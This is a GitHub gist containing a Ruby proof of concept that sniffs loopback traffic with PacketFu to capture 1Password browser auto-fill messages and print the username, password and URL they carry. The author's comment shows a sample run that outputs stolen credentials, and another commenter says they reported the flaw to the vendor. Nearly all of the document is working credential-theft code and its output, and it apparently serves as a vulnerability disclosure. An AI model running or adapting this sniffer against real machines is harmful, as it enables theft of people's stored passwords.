Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Steal 1Password credentials from browser auto-fill PoC
# Path setting slight of hand:
$: << File.expand_path("../../lib", __FILE__)
require 'packetfu'
require 'json'
capture_thread = Thread.new do
cap = PacketFu::Capture.new(:iface => 'lo0', :start => true)
cap.stream.each do |p|
pkt = PacketFu::Packet.parse p
if pkt.payload.include?("executeFillScript")
parsed_json = JSON.parse(pkt.payload.match(/{"action.*/)[0])
username = parsed_json["payload"]["script"][1][2]
password = parsed_json["payload"]["script"][3][2]
url = parsed_json["payload"]["url"]
puts "[+] Stolen Credentials: user(#{username}), password(#{password}), url(#{url})"
end
end
end
puts "Listening for 1Password interprocess traffic on loopback..."
capture_thread.join
@claudijd
Copy link
Author

claudijd commented May 19, 2016

$ rvmsudo ruby examples/steal_1password_creds.rb
Listening for 1Password interprocess traffic on loopback...
[+] Stolen Credentials: user(wbrandis), password(myvoiceismypassportverify), url(https://login.yahoo.com/config/login_verify2?&.src=ym)

@picchioni
Copy link

picchioni commented May 23, 2016

Funny story about this, I found it too a couple months ago, reported it and 1Password really didn't seem to care.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment